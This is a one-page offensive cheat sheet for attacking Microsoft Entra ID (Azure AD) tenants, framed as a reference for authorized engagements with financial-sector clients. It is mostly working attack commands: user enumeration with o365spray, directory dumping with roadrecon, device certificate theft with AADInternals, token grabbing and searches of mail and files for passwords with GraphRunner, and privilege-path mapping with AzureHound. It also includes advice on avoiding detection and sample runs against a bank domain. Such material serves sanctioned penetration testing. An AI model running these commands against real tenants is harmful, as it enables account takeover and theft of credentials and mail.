← All cheat sheets

ENTRA-ID-ATTACKS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Entra ID (formerly Azure AD) is Microsoft's cloud identity plane
behind M365 and Azure. This sheet covers recon, enumeration, token
abuse, and post-compromise tooling (ROADtools, AADInternals,
GraphRunner, AzureHound) relevant to financial-sector M365 tenants.

UNAUTHENTICATED RECON#

# Validate a tenant exists / get tenant ID:
curl https://login.microsoftonline.com/<domain>/.well-known/openid-configuration
# User enumeration via login endpoint response codes
# (careful: may trip Smart Lockout / Identity Protection)
python3 o365spray.py --validate --domain <domain>
python3 o365spray.py --enum --domain <domain> -U users.txt

ROADTOOLS (roadrecon)#

roadrecon auth -u user@domain -p pass # Authenticate, cache tokens
roadrecon auth --device-code          # Device code flow
roadrecon gather                       # Dump directory to local DB
roadrecon gui                          # Browse the gathered data
roadrecon dump                         # Export objects
# roadrecon plugins: policies, road2timeline, etc.

AADINTERNALS#

Get-AADIntLoginInformation -Domain <domain>    # Tenant recon
Get-AADIntTenantID -Domain <domain>            # Resolve tenant ID
Invoke-AADIntReconAsOutsider -DomainName <d>   # External recon
Get-AADIntAccessTokenForAADGraph               # Acquire token
Export-AADIntLocalDeviceCertificate            # Device cert theft
# AADInternals covers token forging, PTA/seamless SSO abuse,
# and federation (Golden SAML) research - lab use only

GRAPHRUNNER#

# Post-auth toolkit against Microsoft Graph:
Get-GraphTokens                       # Interactive token grab
Invoke-GraphRecon                     # Tenant + permission recon
Invoke-DumpApps                       # App registrations + secrets
Invoke-SearchMailbox -Terms password  # Hunt mail for creds
Invoke-SearchSharePointAndOneDrive    # Hunt files for secrets
Invoke-GraphOpenInboxFinder           # Find readable mailboxes

AZUREHOUND (BloodHound)#

azurehound -u user@domain -p pass list --tenant <id> -o out.json
azurehound --refresh-token <rt> list --tenant <id> -o out.json
# Import out.json into BloodHound to map Azure attack paths:
# - AZUserAccessAdministrator, AZOwner, AZGlobalAdmin edges
# - Escalation via app ownership, role assignment, VM run-command

TOKEN & DEVICE ABUSE#

# Primary Refresh Token (PRT) enables SSO impersonation
# Extract tokens from a compromised host (mimikatz/ROADtoken)
# Refresh tokens are long-lived - prioritize revocation in IR
az account get-access-token           # If az CLI is logged in
az account get-access-token --resource https://graph.microsoft.com

CONDITIONAL ACCESS & MFA REVIEW#

# Defensive/audit angle - enumerate CA policy gaps:
roadrecon plugin policies             # Dump CA policies
# Look for: legacy auth allowed, no MFA on admins, device-only
# trust bypasses, broad "trusted location" exclusions, missing
# risk-based sign-in policies

EXAMPLES#

# External footprint of a tenant before any auth
Invoke-AADIntReconAsOutsider -DomainName targetbank.lu

# Full directory gather for offline analysis
roadrecon auth --device-code && roadrecon gather && roadrecon gui

# Map cloud privilege escalation paths in BloodHound
azurehound --refresh-token $RT list --tenant $TID -o azure.json

# Hunt a compromised mailbox set for plaintext secrets
Invoke-SearchMailbox -Terms "password,vpn,secret" -MessageCount 200

NOTES#

- Entra ID rename: "Azure AD" == "Entra ID" (same product)
- Prefer device-code / refresh-token flows to reduce noise vs
  password spray, which triggers Identity Protection
- Most impactful IR control: revoke refresh tokens + reset PRT,
  not just password reset
- Golden SAML / federation abuse requires ADFS or token-signing
  key access - strictly lab/authorized engagement only
- Pair with DEFENDER-KQL / SENTINEL-KQL sheets for the detection side
- For LU FS clients this maps to DORA ICT risk + identity governance